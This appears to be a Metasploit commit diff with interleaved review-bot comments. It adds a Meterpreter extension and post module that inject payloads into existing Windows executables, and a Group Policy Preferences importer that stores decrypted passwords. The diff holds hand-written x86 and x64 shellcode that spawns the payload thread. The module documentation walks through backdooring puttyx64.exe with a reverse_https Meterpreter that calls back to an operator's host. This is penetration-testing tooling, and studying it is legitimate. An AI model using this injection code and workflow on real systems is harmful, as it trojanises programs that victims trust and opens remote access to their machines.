merge changes

GSoC/Meterpreter_Web_Console
Christian Mehlmauer 2018-08-29 06:09:40 +02:00
commit 14fa41a376
No known key found for this signature in database
GPG Key ID: DCF54A05D6E62591
17 changed files with 735 additions and 44 deletions


@ -18,7 +18,7 @@ PATH
metasploit-concern metasploit-concern
metasploit-credential metasploit-credential
metasploit-model metasploit-model
metasploit-payloads (= 1.3.43) metasploit-payloads (= 1.3.44)
metasploit_data_models metasploit_data_models
metasploit_payloads-mettle (= 0.4.1) metasploit_payloads-mettle (= 0.4.1)
mqtt mqtt
@ -164,7 +164,7 @@ GEM
activemodel (~> 4.2.6) activemodel (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
railties (~> 4.2.6) railties (~> 4.2.6)
metasploit-payloads (1.3.43) metasploit-payloads (1.3.44)
metasploit_data_models (3.0.0) metasploit_data_models (3.0.0)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)


@ -7211,7 +7211,7 @@
], ],
"description": "Claymores Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an\n unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing\n a denial of service.", "description": "Claymores Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an\n unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing\n a denial of service.",
"references": [ "references": [
"CVE-CVE-2018-6317", "CVE-2018-6317",
"URL-https://www.exploit-db.com/exploits/43972/", "URL-https://www.exploit-db.com/exploits/43972/",
"URL-https://github.com/nanopool/Claymore-Dual-Miner" "URL-https://github.com/nanopool/Claymore-Dual-Miner"
], ],
@ -7221,7 +7221,7 @@
"arch": "", "arch": "",
"rport": 3333, "rport": 3333,
"targets": null, "targets": null,
"mod_time": "2018-02-16 16:17:52 +0000", "mod_time": "2018-08-28 13:34:02 +0000",
"path": "/modules/auxiliary/dos/tcp/claymore_dos.py", "path": "/modules/auxiliary/dos/tcp/claymore_dos.py",
"is_install_path": true, "is_install_path": true,
"ref_name": "dos/tcp/claymore_dos", "ref_name": "dos/tcp/claymore_dos",
@ -46101,11 +46101,13 @@
"rport": 8080, "rport": 8080,
"targets": [ "targets": [
"Unix (In-Memory)", "Unix (In-Memory)",
"Windows (In-Memory)",
"Python (In-Memory)", "Python (In-Memory)",
"PowerShell (In-Memory)",
"Linux (Dropper)", "Linux (Dropper)",
"Windows (Dropper)" "Windows (Dropper)"
], ],
"mod_time": "2017-09-08 13:59:29 +0000", "mod_time": "2018-08-28 15:56:45 +0000",
"path": "/modules/exploits/multi/http/struts2_rest_xstream.rb", "path": "/modules/exploits/multi/http/struts2_rest_xstream.rb",
"is_install_path": true, "is_install_path": true,
"ref_name": "multi/http/struts2_rest_xstream", "ref_name": "multi/http/struts2_rest_xstream",
@ -114528,6 +114530,33 @@
"post_auth": false, "post_auth": false,
"default_credential": false "default_credential": false
}, },
"post_windows/manage/peinjector": {
"name": "Peinjector",
"full_name": "post/windows/manage/peinjector",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Maximiliano Tedesco <maxitedesco1@gmail.com>"
],
"description": "This module will inject a specified windows payload into a target executable.",
"references": [
],
"is_server": false,
"is_client": false,
"platform": "Windows",
"arch": "",
"rport": null,
"targets": null,
"mod_time": "2018-08-28 11:33:17 +0000",
"path": "/modules/post/windows/manage/peinjector.rb",
"is_install_path": true,
"ref_name": "windows/manage/peinjector",
"check": false,
"post_auth": false,
"default_credential": false
},
"post_windows/manage/persistence_exe": { "post_windows/manage/persistence_exe": {
"name": "Windows Manage Persistent EXE Payload Installer", "name": "Windows Manage Persistent EXE Payload Installer",
"full_name": "post/windows/manage/persistence_exe", "full_name": "post/windows/manage/persistence_exe",

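--- /dev/null
+++ b/documentation/modules/post/windows/manage/peinjector.md
+## Overview
+This module inserts a payload into an existing PE file on a remote
+machine. When a user launches the binary, the payload will run
+as a thread within the process with the same privs.
+## Module Options
+LHOST IP of host that will receive the connection from the payload.
+LPORT Port for Payload to connect to.
+OPTIONS Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
+PAYLOAD Windows Payload to inject into the targer executable.
+SESSION The session to run this module on.
+TARGETPE Path of the target executable to Path of the target executable to be injected
+## Limitations
+This process is not reverse-able. If you would like to return the
+binary to it's original state, save a copy.
+THE PAYLOAD WILL NOT SPAWN AN INDEPENDENT PROCESS/THREAD AND THE SESSION
+WILL DIE WITH THE BINARY AND/OR WILL KILL THE BINARY WHEN THE SESSION
+EXITS. Be careful closing sessions that were spawned using this method!
+If a setting is wrong, it may cause the binary to fail to launch,
+alerting the user to possible shinnanigans.
+## Vulnerable Applications
+`Vulnerable` is a bad term; this module inserts shellcode into a pe
+file. That means any Windows pe files are `vulnerable`.
+Be aware that some files like calc.exe on later Windows versions
+are not entirely normal in their behvior and are not `vulnerable`
+## Verification steps
+* get session on target
+* `use post/windows/manage/peinjector`
+* `set payload <payload>`
+* `set lport <lport>`
+* `set lhost <lhost>`
+* `set targetpe <*.exe>`
+* `run`
+## Usage
+```
+meterpreter > sysinfo
+Computer : WIN10X64-1511
+OS : Windows 10 (Build 10586).
+Architecture : x64
+System Language : en_US
+Domain : WORKGROUP
+Logged On Users : 2
+Meterpreter : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+msf5 exploit(multi/handler) > use post/windows/manage/peinjector
+msf5 post(windows/manage/peinjector) > show options
+Module options (post/windows/manage/peinjector):
+Name Current Setting Required Description
+---- --------------- -------- -----------
+LHOST yes IP of host that will receive the connection from the payload.
+LPORT 4433 no Port for Payload to connect to.
+OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
+PAYLOAD windows/meterpreter/reverse_https no Windows Payload to inject into the targer executable.
+SESSION yes The session to run this module on.
+TARGETPE no Path of the target executable to be injected
+msf5 post(windows/manage/peinjector) > set lhost 192.168.135.111
+lhost => 192.168.135.111
+msf5 post(windows/manage/peinjector) > set lport 4561
+lport => 4561
+msf5 post(windows/manage/peinjector) > set payload windows/x64/meterpreter/reverse_https
+payload => windows/x64/meterpreter/reverse_https
+msf5 post(windows/manage/peinjector) > set session 1
+session => 1
+msf5 post(windows/manage/peinjector) > set targetpe 'C:\users\msfuser\downloads\puttyx64.exe'
+targetpe => C:\users\msfuser\downloads\puttyx64.exe
+msf5 post(windows/manage/peinjector) > show options
+Module options (post/windows/manage/peinjector):
+Name Current Setting Required Description
+---- --------------- -------- -----------
+LHOST 192.168.135.111 yes IP of host that will receive the connection from the payload.
+LPORT 4561 no Port for Payload to connect to.
+OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
+PAYLOAD windows/x64/meterpreter/reverse_https no Windows Payload to inject into the targer executable.
+SESSION 1 yes The session to run this module on.
+TARGETPE C:\users\msfuser\downloads\puttyx64.exe no Path of the target executable to be injected
+msf5 post(windows/manage/peinjector) > run
+[*] Running module against WIN10X64-1511
+[*] Generating payload
+[*] Injecting Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) into the executable C:\users\msfuser\downloads\puttyx64.exe
+[+] Successfully injected payload into the executable: C:\users\msfuser\downloads\puttyx64.exe
+[*] Post module execution completed
+msf5 post(windows/manage/peinjector) >
+```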


@ -21,6 +21,7 @@ module Msf::DBManager::Import
autoload :CI, 'msf/core/db_manager/import/ci' autoload :CI, 'msf/core/db_manager/import/ci'
autoload :Foundstone, 'msf/core/db_manager/import/foundstone' autoload :Foundstone, 'msf/core/db_manager/import/foundstone'
autoload :FusionVM, 'msf/core/db_manager/import/fusion_vm' autoload :FusionVM, 'msf/core/db_manager/import/fusion_vm'
autoload :GPP, 'msf/core/db_manager/import/gpp'
autoload :IP360, 'msf/core/db_manager/import/ip360' autoload :IP360, 'msf/core/db_manager/import/ip360'
autoload :IPList, 'msf/core/db_manager/import/ip_list' autoload :IPList, 'msf/core/db_manager/import/ip_list'
autoload :Libpcap, 'msf/core/db_manager/import/libpcap' autoload :Libpcap, 'msf/core/db_manager/import/libpcap'
@ -47,6 +48,7 @@ module Msf::DBManager::Import
include Msf::DBManager::Import::CI include Msf::DBManager::Import::CI
include Msf::DBManager::Import::Foundstone include Msf::DBManager::Import::Foundstone
include Msf::DBManager::Import::FusionVM include Msf::DBManager::Import::FusionVM
include Msf::DBManager::Import::GPP
include Msf::DBManager::Import::IP360 include Msf::DBManager::Import::IP360
include Msf::DBManager::Import::IPList include Msf::DBManager::Import::IPList
include Msf::DBManager::Import::Libpcap include Msf::DBManager::Import::Libpcap
@ -164,6 +166,7 @@ module Msf::DBManager::Import
# :ci_xml # :ci_xml
# :foundstone_xml # :foundstone_xml
# :fusionvm_xml # :fusionvm_xml
# :gpp_xml
# :ip360_aspl_xml # :ip360_aspl_xml
# :ip360_xml_v3 # :ip360_xml_v3
# :ip_list # :ip_list
@ -358,6 +361,9 @@ module Msf::DBManager::Import
when "main" when "main"
@import_filedata[:type] = "Outpost24 XML" @import_filedata[:type] = "Outpost24 XML"
return :outpost24_xml return :outpost24_xml
when /Groups|DataSources|Drives|ScheduledTasks|NTServices/
@import_filedata[:type] = "Group Policy Preferences Credentials"
return :gpp_xml
else else
# Give up if we haven't hit the root tag in the first few lines # Give up if we haven't hit the root tag in the first few lines
break if line_count > 10 break if line_count > 10
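Review bot: The new `when /Groups|DataSources|Drives|ScheduledTasks|NTServices/` arm is an unanchored regex, whereas the neighbouring arm `when "main"` compares the detected root tag exactly, so a tag that merely contains one of those words (`UserGroups`, `DrivesReport`) would be routed to the GPP importer ahead of any later arm; anchoring it, `when /\A(Groups|DataSources|Drives|ScheduledTasks|NTServices)\z/`, limits the match to those five root elements. I am inferring from the `when "main"` arm and the "root tag" comment that the subject is the tag name; if it is the raw XML line instead, the same anchoring against the opening tag applies. Group Policy Preferences also stores cpassword entries in Printers.xml, which is not in the list — worth confirming whether `Rex::Parser::GPP` decodes that file before leaving it out. The enclosing detection method starts and ends outside this hunk.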

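--- /dev/null
+++ b/lib/msf/core/db_manager/import/gpp.rb
+require 'rex/parser/group_policy_preferences'
+module Msf::DBManager::Import::GPP
+def import_gpp_xml(args = {}, &block)
+return unless args && args[:data] && !args[:data].empty?
+gpp = Rex::Parser::GPP.parse(args[:data])
+return unless gpp && gpp.any?
+wspace = find_workspace(args[:workspace])
+return unless wspace && wspace.respond_to?(:id)
+gpp.each do |p|
+# Skip incomplete creds
+next unless p[:USER] && p[:PASS]
+# Store decrypted creds
+create_credential(
+workspace_id: wspace.id,
+origin_type: :import,
+filename: args[:filename],
+username: p[:USER],
+private_data: p[:PASS],
+private_type: :password
+)
+end
+# Store entire file as loot, including metadata
+report_loot(
+workspace: wspace,
+path: args[:filename],
+name: File.basename(args[:filename]),
+data: args[:data],
+type: 'microsoft.windows.gpp',
+ctype: 'text/xml',
+info: gpp
+)
+end
+end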
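Review bot: `report_loot` calls `File.basename(args[:filename])`, which raises TypeError when `args[:filename]` is nil, yet the guard at the top of `import_gpp_xml` only requires `args[:data]`; an import that supplies raw data without a filename would therefore create the credentials and then abort before the loot is stored, leaving a half-completed import. `name: File.basename(args[:filename].to_s)` (or an explicit fallback name) avoids that. Separately, `info: gpp` writes the parsed entries, decrypted passwords included, into the loot's free-text info column — a second plaintext copy that surfaces in `loot` listings alongside the credential store; if only metadata is wanted there, pass the entries with `:PASS` stripped. Note also that a file with no decodable entries is dropped entirely by the `gpp.any?` guard rather than kept as loot, which may or may not be intended.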


@ -1493,6 +1493,7 @@ public
# * :ci_xml # * :ci_xml
# * :foundstone_xml # * :foundstone_xml
# * :fusionvm_xml # * :fusionvm_xml
# * :gpp_xml
# * :ip360_aspl_xml # * :ip360_aspl_xml
# * :ip360_xml_v3 # * :ip360_xml_v3
# * :ip_list # * :ip_list


@ -1428,6 +1428,7 @@ class Db
print_line " CI" print_line " CI"
print_line " Foundstone" print_line " Foundstone"
print_line " FusionVM XML" print_line " FusionVM XML"
print_line " Group Policy Preferences Credentials"
print_line " IP Address List" print_line " IP Address List"
print_line " IP360 ASPL" print_line " IP360 ASPL"
print_line " IP360 XML v3" print_line " IP360 XML v3"


@ -0,0 +1,247 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/peinjector/tlv'
module Rex
module Post
module Meterpreter
module Extensions
module Peinjector
###
#
# This meterpreter extensions allow to inject a given shellcode into an executable file.
#
###
class Peinjector < Extension
def initialize(client)
super(client, 'peinjector')
client.register_extension_aliases(
[
{
'name' => 'peinjector',
'ext' => self
}
])
end
def inject_shellcode(opts = {})
return nil unless opts[:shellcode]
request = Packet.create_request('peinjector_inject_shellcode')
request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE, opts[:shellcode])
request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE, opts[:size])
request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64, opts[:isx64])
request.add_tlv(TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE, opts[:targetpe])
response = client.send_request(request)
error_msg = response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT)
raise error_msg if error_msg
return response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT)
end
def add_thread_x86(payload)
stackpreserve = "\x90\x90\x60\x9c" # AUTOMATED ASM: x86 = ['nop', 'nop', 'pushad', 'pushfd']
shellcode = "\xE8\xB7\xFF\xFF\xFF" # AUTOMATED ASM: x86 = ['call 0xffffffbc']
shellcode += payload
thread = "\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B" + # AUTOMATED ASM: x86 = ['cld', 'nop', 'call 0xc8', 'pushad', 'mov ebp, esp', 'xor edx, edx', 'nop', 'invalid']
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02" + # AUTOMATED ASM: x86 = ['push edx', 'xor [ebx+0x528b0c52], cl', 'adc al, 0xeb', 'invalid']
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61" + # AUTOMATED ASM: x86 = ['inc ecx', 'adc [ebx-0x48f0d78e], cl', 'dec edx', 'xor edi, edi', 'xor eax, eax', 'lodsb', 'cmp al, 0x61']
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B" + # AUTOMATED ASM: x86 = ['jl 0x4', 'sub al, 0x20', 'ror edi, 0xd', 'add edi, eax', 'dec ecx', 'jnz 0xfffffffb', 'push edx', 'nop', 'push edi', 'invalid']
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48" + # AUTOMATED ASM: x86 = ['push edx', 'adc [eax+0x13c428b], dl', 'rcl byte [eax-0x1487bf75], 1', 'pop es', 'invalid']
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0" + # AUTOMATED ASM: x86 = ['inc edx', 'add al, 0x85', 'jl 0x3f', 'test eax, eax', 'jz 0x75', 'nop', 'add eax, edx']
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B" + # AUTOMATED ASM: x86 = ['push eax', 'nop', 'mov ecx, [eax+0x18]', 'mov ebx, [eax+0x20]', 'add ebx, edx', 'jecxz 0x64', 'dec ecx', 'mov esi, [ebx+ecx*4]']
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF" + # AUTOMATED ASM: x86 = ['add esi, edx', 'xor edi, edi', 'nop', 'xor eax, eax', 'jmp 0xd', 'jmp far dword [ecx-0x2b]', 'invalid']
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D" + # AUTOMATED ASM: x86 = ['or eax, 0xe038c701', 'jmp 0xc', 'jg 0x24', 'shr bl, cl', 'retf 0xe675', 'invalid']
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B" + # AUTOMATED ASM: x86 = ['clc', 'cmp edi, [ebp+0x24]', 'jnz 0xffffffda', 'pop eax', 'nop', 'mov ebx, [eax+0x24]', 'add ebx, edx', 'nop', 'invalid']
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04" + # AUTOMATED ASM: x86 = ['or al, 0x4b', 'mov ebx, [eax+0x1c]', 'add ebx, edx', 'nop', 'jmp 0xe', 'int 0x97', 'int1', 'mov cl, 0x8b', 'invalid']
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB" + # AUTOMATED ASM: x86 = ['mov eax, [ecx]', 'rcl byte [eax+0x24244489], 1', 'pop ebx', 'pop ebx', 'popad', 'nop', 'pop ecx', 'pop edx', 'push ecx', 'invalid']
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90" + # AUTOMATED ASM: x86 = ['add [edi], ecx', 'jmp eax', 'pop eax', 'nop', 'pop edi', 'pop edx', 'mov edx, [edx]', 'jmp 0xffffff62', 'nop']
"\x5D\x90" + # AUTOMATED ASM: x86 = ['pop ebp', 'nop'] x64 = ['pop rbp', 'nop']
"\xBE" # AUTOMATED ASM: x86 = ['invalid'] x64 = ['invalid']
thread +=[shellcode.length - 5].pack("V")
thread += "\x90\x6A\x40\x90\x68\x00\x10\x00\x00" + # AUTOMATED ASM: x86 = ['nop', 'push 0x40', 'nop', 'push 0x1000']
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90" + # AUTOMATED ASM: x86 = ['push esi', 'nop', 'push 0x0', 'push 0xe553a458', 'call ebp', 'mov ebx, eax', 'mov edi, eax', 'nop']
"\x89\xF1" # AUTOMATED ASM: x86 = ['mov ecx, esi'] x64 = ['mov ecx, esi']
thread += "\xeb\x44" # <--length of shellcode below # AUTOMATED ASM: x86 = ['jmp 0x46']
thread += "\x90\x5e" # AUTOMATED ASM: x86 = ['nop', 'pop esi']
thread += "\x90\x90\x90" + # AUTOMATED ASM: x86 = ['nop', 'nop', 'nop']
"\xF2\xA4" + # AUTOMATED ASM: x86 = ['repne movsb']
"\xE8\x20\x00\x00" + # AUTOMATED ASM: x86 = ['invalid']
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06" + # AUTOMATED ASM: x86 = ['add [ebx+0xa2a1de0], bh', 'nop', 'push 0x9dbd95a6', 'call ebp', 'cmp al, 0x6']
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF" + # AUTOMATED ASM: x86 = ['jl 0xc', 'cmp bl, 0xe0', 'jnz 0xc', 'mov ebx, 0x6f721347', 'push 0x0', 'push ebx', 'invalid']
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5" + # AUTOMATED ASM: x86 = ['aad 0x31', 'rcl byte [eax+0x50], 0x50', 'push ebx', 'push eax', 'push eax', 'push 0x160d6838', 'call ebp']
"\x58\x58\x90\x61" # AUTOMATED ASM: x86 = ['pop eax', 'pop eax', 'nop', 'popad']
thread += "\xe9" # AUTOMATED ASM: x86 = ['invalid']
thread += [shellcode.length].pack("V")
return stackpreserve + thread + shellcode
end
def add_thread_x64(payload)
stackpreserve = "\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50" + # AUTOMATED ASM: x64 = ['nop', 'push rax', 'push rbx', 'push rcx', 'push rdx', 'push rsi', 'push rdi', 'push rbp', 'push r8']
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c" # AUTOMATED ASM: x64 = ['push r9', 'push r10', 'push r11', 'push r12', 'push r13', 'push r14', 'push r15', 'pushfq']
shellcode = "\xE8\xB8\xFF\xFF\xFF" # AUTOMATED ASM: x64 = ['call 0xffffffffffffffbd']
shellcode += payload
thread = "\x90" + # <--THAT'S A NOP. \o/ # AUTOMATED ASM: x64 = ['nop']
"\xe8\xc0\x00\x00\x00" + # jmp to allocate # AUTOMATED ASM: x64 = ['call 0xc5']
# api_call
"\x41\x51" + # push r9
"\x41\x50" + # push r8
"\x52" + # push rdx
"\x51" + # push rcx
"\x56" + # push rsi
"\x48\x31\xD2" + # xor rdx,rdx
"\x65\x48\x8B\x52\x60" + # mov rdx,qword ptr gs:[rdx+96]
"\x48\x8B\x52\x18" + # mov rdx,qword ptr [rdx+24]
"\x48\x8B\x52\x20" + # mov rdx,qword ptr[rdx+32]
# next_mod
"\x48\x8b\x72\x50" + # mov rsi,[rdx+80]
"\x48\x0f\xb7\x4a\x4a" + # movzx rcx,word [rdx+74]
"\x4d\x31\xc9" + # xor r9,r9
# loop_modname
"\x48\x31\xc0" + # xor rax,rax
"\xac" + # lodsb
"\x3c\x61" + # cmp al, 61h (a)
"\x7c\x02" + # jl 02h
"\x2c\x20" + # sub al, 0x20
# not_lowercase
"\x41\xc1\xc9\x0d" + # ror r9d, 13
"\x41\x01\xc1" + # add r9d, eax
"\xe2\xed" + # loop until read, back to xor rax, rax
"\x52" + # push rdx ;Save the current position in the module list
"\x41\x51" + # push r9 ; Save the current module hash for later
# ; Proceed to iterate the export address table,
"\x48\x8b\x52\x20" + # mov rdx, [rdx+32] ; Get this modules base address
"\x8b\x42\x3c" + # mov eax, dword [rdx+60] ; Get PE header
"\x48\x01\xd0" + # add rax, rdx ; Add the modules base address
"\x8b\x80\x88\x00\x00\x00" + # mov eax, dword [rax+136] ; Get export tables RVA
"\x48\x85\xc0" + # test rax, rax ; Test if no export address table
"\x74\x67" + # je get_next_mod1 ; If no EAT present, process the nex
"\x48\x01\xd0" + # add rax, rdx ; Add the modules base address
"\x50" + # push rax ; Save the current modules EAT
"\x8b\x48\x18" + # mov ecx, dword [rax+24] ; Get the number of function
"\x44\x8b\x40\x20" + # mov r8d, dword [rax+32] ; Get the rva of the function
"\x49\x01\xd0" + # add r8, rdx ; Add the modules base address
# get_next_func: ;
"\xe3\x56" + # jrcxz get_next_mod; When we reach the start of the EAT
"\x48\xff\xc9" + # dec rcx ; Decrement the function name counter
"\x41\x8b\x34\x88" + # mov esi, dword [r8+rcx*4]; Get rva of next module name
"\x48\x01\xd6" + # add rsi, rdx ; Add the modules base address
"\x4d\x31\xc9" + # xor r9, r9 ; Clear r9 which will store the hash
# ; And compare it to the one we wan
# loop_funcname: ;
"\x48\x31\xc0" + # xor rax, rax ; Clear rax
"\xac" + # lodsb ; Read in the next byte of the ASCII funct name
"\x41\xc1\xc9\x0d" + # ror r9d, 13 ; Rotate right our hash value
"\x41\x01\xc1" + # add r9d, eax ; Add the next byte of the name
"\x38\xe0" + # cmp al, ah ; Compare AL to AH (null)
"\x75\xf1" + # jne loop_funcname ; continue
"\x4c\x03\x4c\x24\x08" + # add r9, [rsp+8] ; Add the current module hash
"\x45\x39\xd1" + # cmp r9d, r10d ; Compare the hash
"\x75\xd8" + # jnz get_next_func ; Go compute the next function hash
"\x58" + # pop rax ; Restore the current modules EAT
"\x44\x8b\x40\x24" + # mov r8d, dword [rax+36] ; Get the ordinal table rva
"\x49\x01\xd0" + # add r8, rdx ; Add the modules base address
"\x66\x41\x8b\x0c\x48" + # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
"\x44\x8b\x40\x1c" + # mov r8d, dword [rax+28] ; Get the funct addr table rva
"\x49\x01\xd0" + # add r8, rdx ; Add the modules base address
"\x41\x8b\x04\x88" + # mov eax, dword [r8+4*rcx]; Get the desired func RVA
"\x48\x01\xd0" + # add rax, rdx ; Add the modules base address
# finish:
"\x41\x58" + # pop r8 ; Clear off the current modules hash
"\x41\x58" + # pop r8 ;Clear off the curr position in the module list
"\x5E" + # pop rsi ; Restore RSI
"\x59" + # pop rcx ; Restore the 1st parameter
"\x5A" + # pop rdx ; Restore the 2nd parameter
"\x41\x58" + # pop r8 ; Restore the 3rd parameter
"\x41\x59" + # pop r9 ; Restore the 4th parameter
"\x41\x5A" + # pop r10 ; pop off the return address
"\x48\x83\xEC\x20" + # sub rsp, 32 ; reserve space for the register params
"\x41\x52" + # push r10 ; push back the return address
"\xFF\xE0" + # jmp rax ; Jump into the required function
# get_next_mod: ;
"\x58" + # pop rax ; Pop off the current modules EAT
# get_next_mod1: ;
"\x41\x59" + # pop r9 ; Pop off the current modules hash
"\x5A" + # pop rdx ; Restore our position in the module list
"\x48\x8B\x12" + # mov rdx, [rdx] ; Get the next module
"\xe9\x57\xff\xff\xff" # jmp next_mod ; Process this module
# allocate
thread += "\x5d" + # pop rbp
"\x49\xc7\xc6" # mov r14, 1abh size of payload... # AUTOMATED ASM: x64 = ['invalid']
thread += [shellcode.length - 5].pack("V")
thread += "\x6a\x40" + # push 40h
"\x41\x59" + # pop r9 now 40h
"\x68\x00\x10\x00\x00" + # push 1000h
"\x41\x58" + # pop r8.. now 1000h
"\x4C\x89\xF2" + # mov rdx, r14
"\x6A\x00" + # push 0
"\x59" + # pop rcx
"\x68\x58\xa4\x53\xe5" + # push E553a458
"\x41\x5A" + # pop r10
"\xff\xd5" + # call rbp
"\x48\x89\xc3" + # mov rbx, rax ; Store allocated address in ebx
"\x48\x89\xc7" # mov rdi, rax ; Prepare EDI with the new address
thread += "\x48\xc7\xc1" # AUTOMATED ASM: x86 = ['dec eax', 'invalid'] x64 = ['invalid']
thread += [shellcode.length - 5].pack("V")
thread += "\xeb\x43" # AUTOMATED ASM: x86 = ['jmp 0x45'] x64 = ['jmp 0x45']
# got_payload:
thread += "\x5e" + # pop rsi ; Prepare ESI with the source
"\xf2\xa4" + # repne movsb ; Copy the payload to RWX memo
"\xe8\x00\x00\x00\x00" + # call set_handler ; Configure error handling
# set_handler:
"\x48\x31\xC0" + # xor rax,rax
"\x50" + # push rax ; LPDWORD lpThreadId (NULL)
"\x50" + # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" + # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" + # mov rdx, rax ; LPTHREAD_START_ROUTINE (payload)
"\x49\x89\xD8" + # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" + # mov rcx, rax ; LPSECURITY_ATTRIBUTES (NULL)
"\x49\xC7\xC2\x38\x68\x0D\x16" + # mov r10, 0x160D6838 ; hash("kernel32.dll","CreateThread")
"\xFF\xD5" + # call rbp ; Spawn payload thread
"\x48\x83\xC4\x58" + # add rsp, 50
# stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59" + # AUTOMATED ASM: x64 = ['popfq', 'pop r15', 'pop r14', 'pop r13', 'pop r12', 'pop r11', 'pop r10', 'pop r9']
"\x41\x58\x5d\x5c\x5f\x5e\x5a\x59\x5b\x58" # AUTOMATED ASM: x64 = ['pop r8', 'pop rbp', 'pop rsp', 'pop rdi', 'pop rsi', 'pop rdx', 'pop rcx', 'pop rbx', 'pop rax']
thread += "\xe9" # AUTOMATED ASM: x64 = ['invalid']
thread += [shellcode.length].pack("V")
return stackpreserve + thread + shellcode
end
end
end
end
end
end
end
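Review bot: In `inject_shellcode`, the RESULT TLV is read as an error and raised whenever it is present, so the trailing `return response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT)` can only ever yield nil — either the server reports success some other way and that line is dead, or a success string from the server is raised as a failure; unless the server really uses one TLV for both, drop the unreachable return and document the contract, `# Returns nil on success; raises RuntimeError with the server-supplied message otherwise`. `opts[:size]` is also sent unconditionally, so a caller that omits it adds a nil UINT TLV; `opts.fetch(:size) { opts[:shellcode].bytesize }` would be safer. In `add_thread_x64`, by my count the restore sequence pops one register more than `stackpreserve` pushes (the `\x5c` / `pop rsp` in the final stub line has no matching `push rsp` in the prologue), which would load the saved rdi into rsp right after `pop rbp` — worth verifying on a real run, since the module docs show injection succeeding but not the patched binary executing.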

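--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/peinjector/tlv.rb
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Peinjector
+TLV_TYPE_PEINJECTOR_SHELLCODE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1)
+TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2)
+TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64 = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 3)
+TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
+TLV_TYPE_PEINJECTOR_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5)
+end
+end
+end
+end
+end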

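--- /dev/null
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+module Rex
+module Post
+module Meterpreter
+module Ui
+###
+#
+# Peinjector extension - inject a given shellcode into an executable file
+#
+###
+class Console::CommandDispatcher::Peinjector
+Klass = Console::CommandDispatcher::Peinjector
+include Console::CommandDispatcher
+#
+# Name for this dispatcher
+#
+def name
+'Peinjector'
+end
+#
+# List of supported commands.
+#
+def commands
+{
+'injectpe' => 'Inject a shellcode into a given executable'
+}
+end
+@@injectpe_opts = Rex::Parser::Arguments.new(
+'-p' => [true, 'Windows Payload to inject into the targer executable.'],
+'-t' => [true, 'Path of the target executable to be injected'],
+'-o' => [true, 'Comma separated list of additional options for payload if needed in \'opt1=val,opt2=val\' format.'],
+'-h' => [false, 'Help banner']
+)
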